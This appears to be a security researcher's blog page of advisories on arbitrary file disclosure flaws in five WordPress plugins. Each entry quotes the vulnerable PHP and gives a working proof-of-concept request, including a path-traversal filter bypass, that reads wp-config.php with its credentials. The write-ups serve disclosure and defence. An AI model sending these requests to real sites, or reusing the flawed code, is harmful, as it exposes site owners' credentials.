File Disclosure | ceriksen.com

February 18, 2013 by Charlie Eriksen

WordPress Online Store arbitrary file disclosure

Advisory

Analysis of vulnerability

The plugin hooks two functions as a part of its core functionality in core.php by adding an action for init and admin_init.

add_action('init', 'osc_session_init_fend'); // starts session
add_action('admin_init', 'osc_session_init'); // starts session

3 4	add_action('init', 'osc_session_init_fend'); // starts session add_action('admin_init', 'osc_session_init'); // starts session

The first line calls into osc_session_init_fend whenever a WordPress page is loaded, in order to set up a session.

function osc_session_init_fend()
{
    session_name('osCsid');
    $request_type = (getenv('HTTPS') == 'on') ? 'SSL' : 'NONSSL';
    if (isset($_POST['osCsid'])) {

        session_id($_POST['osCsid']);

    } else if (($request_type == 'SSL') && isset($_GET['osCsid']) ) {

        session_id($_GET['osCsid']);

    }
    //if (!session_id())
    session_start();
    ob_start();
    if ($_REQUEST['force']=='downloadnow') {
        header('Content-type: application/x-octet-stream');
        header('Content-disposition: attachment; filename=' . $_REQUEST['file']);

        readfile($_REQUEST['turl'] . $_REQUEST['file']);
        // unlink($_REQUEST['turl'] . $_REQUEST['backup_file']);

    }
    wp_enqueue_script('jquery');
}

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

function osc_session_init_fend()

{

session_name('osCsid');

$request_type = (getenv('HTTPS') == 'on') ? 'SSL' : 'NONSSL';

if (isset($_POST['osCsid'])) {

session_id($_POST['osCsid']);

} else if (($request_type == 'SSL') && isset($_GET['osCsid']) ) {

session_id($_GET['osCsid']);

}

//if (!session_id())

session_start();

ob_start();

if ($_REQUEST['force']=='downloadnow') {

header('Content-type: application/x-octet-stream');

header('Content-disposition: attachment; filename=' . $_REQUEST['file']);

readfile($_REQUEST['turl'] . $_REQUEST['file']);

// unlink($_REQUEST['turl'] . $_REQUEST['backup_file']);

}

wp_enqueue_script('jquery');

}

The interesting thing is that on line 136 is checks the “force” request variable to see if it matches to “downloadnow”. If it is set, it will change the content type of the response to be a download, and then read the file set by the request variables “turl” and “file” and write that to the response. These variables are however not sanitized, which leads to an arbitrary file disclosure. We can exploit this by making a request to any page with following querystring, which will force the browser to download a page containing the contents of the wp-config.php file at the top of the file:

?force=downloadnow&turl=./&file=wp-config.php

1	?force=downloadnow&turl=./&file=wp-config.php

January 12, 2013 by Charlie Eriksen

WordPress Zingiri Forums arbitrary file disclosure

Advisory

Secunia Advisory SA50833

Analysis of vulnerability

The Zingiri Web Forums for WordPress writes our a header for the forum in forum.php through adding an action to wp_head.

add_action('wp_head','zing_forum_header');

44	add_action('wp_head','zing_forum_header');

function zing_forum_header()
{
	global $zing_forum_content;
	global $zing_forum_menu;
	$output=zing_forum_output("content");

	zing_integrator_cut($output,'<div id="footer">','</div>'); //remove footer
	zing_integrator_cut($output,'<span class="forgot_password">','</span>');

	$zing_forum_content=$output;

	echo '<script type="text/javascript" language="javascript">';
	echo "var zing_forum_url='".ZING_FORUM_URL."ajax/';";
	echo "var zing_forum_index='".get_option('home')."/index.php?';";
	echo "function zing_forum_url_ajax(s) { return zing_forum_url+s; }";
	echo '</script>';

	echo '<link rel="stylesheet" type="text/css" href="' . ZING_FORUM_URL . 'zing.css" media="screen" />';
}

686

687

688

689

690

691

692

693

694

695

696

697

698

699

700

701

702

703

704

function zing_forum_header()

{

global $zing_forum_content;

global $zing_forum_menu;

$output=zing_forum_output("content");

zing_integrator_cut($output,'<div id="footer">','</div>'); //remove footer

zing_integrator_cut($output,'<span class="forgot_password">','</span>');

$zing_forum_content=$output;

echo '<script type="text/javascript" language="javascript">';

echo "var zing_forum_url='".ZING_FORUM_URL."ajax/';";

echo "var zing_forum_index='".get_option('home')."/index.php?';";

echo "function zing_forum_url_ajax(s) { return zing_forum_url+s; }";

echo '</script>';

echo '<link rel="stylesheet" type="text/css" href="' . ZING_FORUM_URL . 'zing.css" media="screen" />';

}

So on each load of the WordPress blog it will call into zing_forum_header. The first call it makes it into zing_forum_output, which is rather long. I’ve highlighted two areas:

function zing_forum_output($process) {
	global $post,$wpdb,$zing_forum_loaded,$zing_forum_to_include,$zing_forum_mode;

	$postVar=array();
	switch ($process)
	{
		case "content":
			if (isset($post)) $cf=get_post_custom($post->ID);
			if (isset($_GET['zforum']))
			{
				$zing_forum_to_include=$_GET['zforum'];
				$zing_forum_mode="forum";
			}

456

457

458

459

460

461

462

463

464

465

466

467

468

function zing_forum_output($process) {

global $post,$wpdb,$zing_forum_loaded,$zing_forum_to_include,$zing_forum_mode;

$postVar=array();

switch ($process)

{

case "content":

if (isset($post)) $cf=get_post_custom($post->ID);

if (isset($_GET['zforum']))

{

$zing_forum_to_include=$_GET['zforum'];

$zing_forum_mode="forum";

}

We can affect the value of $zing_forum_to_include through the zforum GET variable. This is then used in a big else if statement. Here is the block of code that is executed if we set that to css:

} elseif ($zing_forum_to_include=='css') {
		ob_end_clean();
		if (isset($_GET['stylesheet'])) $key=$_GET['stylesheet'];
		else $key=$_GET['url'];
		if (isset($_SESSION['ccforum']['stylesheet'][$key])) {
			$output=$_SESSION['ccforum']['stylesheet'][$key];
		} else {
			if (isset($_GET['stylesheet'])) {
				$http=zing_forum_http("mybb",'css.php',"");
				$news = new zHttpRequest($http,'zingiri-forum');
				if (!$news->curlInstalled()) return "cURL not installed";
				elseif (!$news->live()) return "A HTTP Error occured";
				$output=$news->DownloadToString();
				$output=str_replace('url(images/','url('.ZING_MYBB_URL.'/images/',$output);

			} elseif ($_GET['url']) {
				$url=$_GET['url'];
				$output=file_get_contents(ZING_MYBB_DIR.'/cache/themes/'.$url);
			}
			$f[]='/^body.*{(.*?)/';
			$r[]=' {$1';
			$f[]='/.zingbody/';
			$r[]='';
			$f[]='/(.*?).{(.*?)/';
			$r[]='.ccforum $1 {$2';
			$f[]='/(.*?),(.*?).{(.*?)/';
			$r[]='$1,.ccforum $2 {$3';
			$f[]='/(.*?),(.*?),(.*?).{(.*?)/';
			$r[]='$1,$2,.ccforum $3 {$4';
			$output=preg_replace($f,$r,$output,-1,$count);
			if ($output) $_SESSION['ccforum']['stylesheet'][$key]=$output;
		}
		header("Content-type: text/css");
		echo $output;
		die();

541

542

543

544

545

546

547

548

549

550

551

552

553

554

555

556

557

558

559

560

561

562

563

564

565

566

567

568

569

570

571

572

573

574

575

} elseif ($zing_forum_to_include=='css') {

ob_end_clean();

if (isset($_GET['stylesheet'])) $key=$_GET['stylesheet'];

else $key=$_GET['url'];

if (isset($_SESSION['ccforum']['stylesheet'][$key])) {

$output=$_SESSION['ccforum']['stylesheet'][$key];

} else {

if (isset($_GET['stylesheet'])) {

$http=zing_forum_http("mybb",'css.php',"");

$news = new zHttpRequest($http,'zingiri-forum');

if (!$news->curlInstalled()) return "cURL not installed";

elseif (!$news->live()) return "A HTTP Error occured";

$output=$news->DownloadToString();

$output=str_replace('url(images/','url('.ZING_MYBB_URL.'/images/',$output);

} elseif ($_GET['url']) {

$url=$_GET['url'];

$output=file_get_contents(ZING_MYBB_DIR.'/cache/themes/'.$url);

}

$f[]='/^body.*{(.*?)/';

$r[]=' {$1';

$f[]='/.zingbody/';

$r[]='';

$f[]='/(.*?).{(.*?)/';

$r[]='.ccforum $1 {$2';

$f[]='/(.*?),(.*?).{(.*?)/';

$r[]='$1,.ccforum $2 {$3';

$f[]='/(.*?),(.*?),(.*?).{(.*?)/';

$r[]='$1,$2,.ccforum $3 {$4';

$output=preg_replace($f,$r,$output,-1,$count);

if ($output) $_SESSION['ccforum']['stylesheet'][$key]=$output;

}

header("Content-type: text/css");

echo $output;

die();

If we don’t set anything expect the “url” get variable, we can cause it to be fed into the file_get_contents call on line 554. We can abuse this to disclose the contents of the wp-config.php file like this:

http://192.168.80.130/wordpress/?zforum=css&url=../../../../../../wp-config.php

1	http://192.168.80.130/wordpress/?zforum=css&url=../../../../../../wp-config.php

January 3, 2013 by Charlie Eriksen

WordPress Google Document Embedder arbitrary file disclosure

Advisory

Secunia Advisory SA50832

Analysis of vulnerability

Google Document Embedder offers a proxy for forcing a PDF to download rather than use the default browser handler. It implements this through /libs/pdf.php:

if (ini_get('allow_url_fopen') !== "1") {
	if (function_exists('curl_version')) {
		$curl = 1;
	} else {
		$err = "This function is not supported on your web server. Please add ";
		$err .= "<code>allow_url_fopen = 1</code> to your php.ini or enable cURL library. ";
		$err .= "If you are unable to do this, please change the Link Behavior setting to ";
		$err .= "Browser Default in GDE Options.";
		showErr($err);
		exit;
	}
}

if ((isset($_GET['fn'])) && (isset($_GET['file']))) { 
	// check for invalid file type
	if (!preg_match("/\.pdf$/i",$_GET['fn'])) {
		showErr('Invalid file type; action cancelled.');
	}

	// ready file
	$file = urldecode($file);
	$fileParts = parse_url($file);
	if (preg_match("/^https/i", $fileParts['scheme'])) {
		$ssl = true;
	} else {
		$ssl = false;
	}

	// get file
	if ($curl) {
		$code = @curl_get_contents($_GET['file'], $ssl);  
	} else {
		$code = @file_get_contents($_GET['file']); 
	}

	// output file
	header('Content-type: application/pdf');
	header('Content-Disposition: attachment; filename="'.$_GET['fn'].'"');
	echo $code;

if (ini_get('allow_url_fopen') !== "1") {

if (function_exists('curl_version')) {

$curl = 1;

} else {

$err = "This function is not supported on your web server. Please add ";

$err .= "<code>allow_url_fopen = 1</code> to your php.ini or enable cURL library. ";

$err .= "If you are unable to do this, please change the Link Behavior setting to ";

$err .= "Browser Default in GDE Options.";

showErr($err);

exit;

}

if ((isset($_GET['fn'])) && (isset($_GET['file']))) {

// check for invalid file type

if (!preg_match("/\.pdf$/i",$_GET['fn'])) {

showErr('Invalid file type; action cancelled.');

}

// ready file

$file = urldecode($file);

$fileParts = parse_url($file);

if (preg_match("/^https/i", $fileParts['scheme'])) {

$ssl = true;

} else {

$ssl = false;

}

// get file

if ($curl) {

$code = @curl_get_contents($_GET['file'], $ssl);

} else {

$code = @file_get_contents($_GET['file']);

}

// output file

header('Content-type: application/pdf');

header('Content-Disposition: attachment; filename="'.$_GET['fn'].'"');

echo $code;

First it will check if allow_url_fopen is enabled. Then it checks the two variables we need to provide, the “fn”(Filename) and “file” GET parameters. If both are provided it will verify that the filename ends in .pdf. From there, it goes onto deicing how to fetch the file, and eventually call into file_get_contents by passing the file GET parameter straight into the call. Note that the filename is only used to determine the filename returned on line 45. Because it will use file_get_contents if at all possible, we can provide a local path to include. We can for instance fetch the wp-config.php file like this:

http://192.168.80.130/wordpress/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php

1	http://192.168.80.130/wordpress/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php

January 2, 2013 by Charlie Eriksen

WordPress Duplicator plugin arbitrary file disclosure

Analysis of vulnerability

In version 0.3.0 of WordPress duplicator the file /files/installer.rescue.php and /files/installer.template.php which were added for security reasons. The file was made to download an installer file. They both start with this snippet of code::

//DOWNLOAD ONLY: 
if ( isset($_GET['get'])) {

	$file = $_GET['file'];
	if (file_exists($file)) {
		header('Content-Description: File Transfer');
		header('Content-Type: application/octet-stream');
		header('Content-Disposition: attachment; filename=installer.php');
		header('Content-Transfer-Encoding: binary');
		header('Expires: 0');
		header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
		header('Pragma: public');
		header('Content-Length: ' . filesize($file));
		ob_clean();
		@flush();
		if (@readfile($file) == false) {
			$data = file_get_contents($file);
			if ($data == false) {
				die("Unable to read installer file.  The server currently has readfile and file_get_contents disabled on this server.  Please contact your server admin to remove this restriction");
			} else {
				print $data;
			}
		}
		exit;
	} 
}

//DOWNLOAD ONLY:

if ( isset($_GET['get'])) {

$file = $_GET['file'];

if (file_exists($file)) {

header('Content-Description: File Transfer');

header('Content-Type: application/octet-stream');

header('Content-Disposition: attachment; filename=installer.php');

header('Content-Transfer-Encoding: binary');

header('Expires: 0');

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');

header('Pragma: public');

header('Content-Length: ' . filesize($file));

ob_clean();

@flush();

if (@readfile($file) == false) {

$data = file_get_contents($file);

if ($data == false) {

die("Unable to read installer file. The server currently has readfile and file_get_contents disabled on this server. Please contact your server admin to remove this restriction");

} else {

print $data;

}

exit;

}

If the “get” querystring parameter is set, it will read the file specified by the “file” querystring parameter and read that into the response as installer.php. But because this file is deployed by default to all installations and it does not sanitize the “file” variable, we can use it to read any arbitrary file by making a request like this:

http://192.168.80.130/wordpress/wp-content/plugins/duplicator/files/installer.rescue.php?get=&file=../../../../wp-config.php

1	http://192.168.80.130/wordpress/wp-content/plugins/duplicator/files/installer.rescue.php?get=&file=../../../../wp-config.php

October 24, 2012 by Charlie Eriksen

WordPress Cimy User Manager arbitrary file disclosure

Advisory

Secunia Advisory SA 50834

Analysis of vulnerability

The Cimy User Manager is made to be able to export data from WordPress. The file cimy_user_manager.php has an init action which decides whether or not to download some content from the site:

add_action('init', 'cimy_um_download_database');

function cimy_um_download_database() {
	if (!empty($_POST["cimy_um_filename"])) {
		if (strpos($_SERVER['HTTP_REFERER'], admin_url('users.php?page=cimy_user_manager')) !== false) {
			$cimy_um_filename = $_POST["cimy_um_filename"];
			// protect from site traversing
			$cimy_um_filename = str_replace('../', '', $cimy_um_filename);
			if (!is_file($cimy_um_filename))
				return;

			header("Pragma: "); // Leave blank for issues with IE
			header("Expires: 0");
			header('Vary: User-Agent');
			header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
			header("Content-Type: text/csv");
			header("Content-Type: application/force-download");
			header("Content-Type: application/download");
			header("Content-Disposition: attachment; filename=\"".esc_html(basename($cimy_um_filename))."\";"); // cannot use esc_url any more because prepends 'http' (doh)
			header("Content-Transfer-Encoding: binary");
			header("Content-Length: ".filesize($cimy_um_filename));
			readfile($cimy_um_filename);
			exit();
		}
	}
}

add_action('init', 'cimy_um_download_database');

function cimy_um_download_database() {

if (!empty($_POST["cimy_um_filename"])) {

if (strpos($_SERVER['HTTP_REFERER'], admin_url('users.php?page=cimy_user_manager')) !== false) {

$cimy_um_filename = $_POST["cimy_um_filename"];

// protect from site traversing

$cimy_um_filename = str_replace('../', '', $cimy_um_filename);

if (!is_file($cimy_um_filename))

return;

header("Pragma: "); // Leave blank for issues with IE

header("Expires: 0");

header('Vary: User-Agent');

header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Content-Type: text/csv");

header("Content-Type: application/force-download");

header("Content-Type: application/download");

header("Content-Disposition: attachment; filename=\"".esc_html(basename($cimy_um_filename))."\";"); // cannot use esc_url any more because prepends 'http' (doh)

header("Content-Transfer-Encoding: binary");

header("Content-Length: ".filesize($cimy_um_filename));

readfile($cimy_um_filename);

exit();

}

First it checks if the cimy_um_filename POST variable is set. Then it goes to check if the referer is from the admin page, which is a flawed way of authentication. But if it thinks you come from the admin page, it will attempt to protect against path traversal. It is pretty obvious that we can fake the referer header. But we can quite easily bypass the path traversal. Lets have a look at an example.

Take this string: …/…//
Now lets see where we match ../: .../...//
Which leaves us with: ../

This tells us that the path traversal “protection” on line 78 can be bypassed trivially.

Additionally, in the case where you’d want to obtain a wp-config.php file, which contains credentials and other very critical information about the blog, we do not need to bypass this, because when init is called, the working directory is the wordpress base folder, which contains the wp-config.php file. Here’s an example request showing how to pull the wp-config.php file:

POST /wordpress/ HTTP/1.0
Host: 192.168.80.130
Referer: http://192.168.80.130/wordpress/wp-admin/users.php?page=cimy_user_manager
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

cimy_um_filename=wp-config.php

POST /wordpress/ HTTP/1.0

Host: 192.168.80.130

Referer: http://192.168.80.130/wordpress/wp-admin/users.php?page=cimy_user_manager

Content-Type: application/x-www-form-urlencoded

Content-Length: 30

cimy_um_filename=wp-config.php